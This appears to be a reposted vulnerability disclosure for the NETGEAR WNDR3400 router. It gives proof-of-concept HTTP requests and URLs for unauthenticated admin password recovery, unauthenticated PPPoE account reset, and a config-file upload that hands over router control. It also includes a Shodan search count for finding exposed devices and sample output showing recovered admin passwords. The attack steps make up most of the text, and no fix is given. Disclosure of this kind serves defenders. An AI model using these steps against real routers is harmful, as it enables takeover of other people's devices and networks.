NETGEAR N600 WIRELESS DUAL BAND WNDR3400 – Multiple Vulnerabilities

日期: 2014/04/27 | 标签: | 游览:3,111

Title: Multiple vulnerabilities in NETGEAR N600 WIRELESS DUAL BAND WNDR3400
====================================================================================
Notification Date: 4/14/2014
Affected Vendor: NETGEAR N600 WIRELESS DUAL BAND WNDR3400
Firmware Version: Firmware Version 1.0.0.38 AND BELOW (ALL versions affected)
Issue Types: password Disclosure File Uploading with AuthPPOPE settings Change
Discovered by: Santhosh Kumar twitter: @security_b0x
Issue status: No Patch >From the Vendors.
grettings: @Anami2111 (anamika singh) — creator of wihawk

====================================================================================
Summary:
========
While i was lurking around the Netgear firmware today i came across various tweaking and others i was able to find a password disclosure,File uploading vulnerably which could compromise the entire router.as of now no patch from the vendor.

Password Disclosure:
====================
url: server/unauth.cgi?id=393087602
Generating with the 401 unauthorised error
poc:
Host: server:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server:8080/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Router Password Recovered

\

poc2:

server:8080/passwordrecovered.cgi?id=1738955828

==============================================================================================================================

Ppope account reset:

Netgear runs a utility called “netgear genie” which does not have proper authentication on reaching “genie_pppoe.htm ”

which allows to reset the ppoe username which any basic authentication.

http://server/genie_pppoe.htm

==============================================================================================================================

File Upload (router reset):

like the same one above the “http://server/genie_restore.htm”

the config file can be uploaded which leading to reseting the control to attackers username and password.

*.cfg file.

==============================================================================================================================
SHODAN DORK:
wndr3400: 10198 for wndr3400

******************************************************************************************************************************

You have successfully recovered the admin password.
Router Admin Username admin
Router Admin Password password
You have successfully recovered the admin password.
Router Admin Username admin
Router Admin Password 0514
You can now log in to the router using username “admin” and this recovered password.

评论关闭。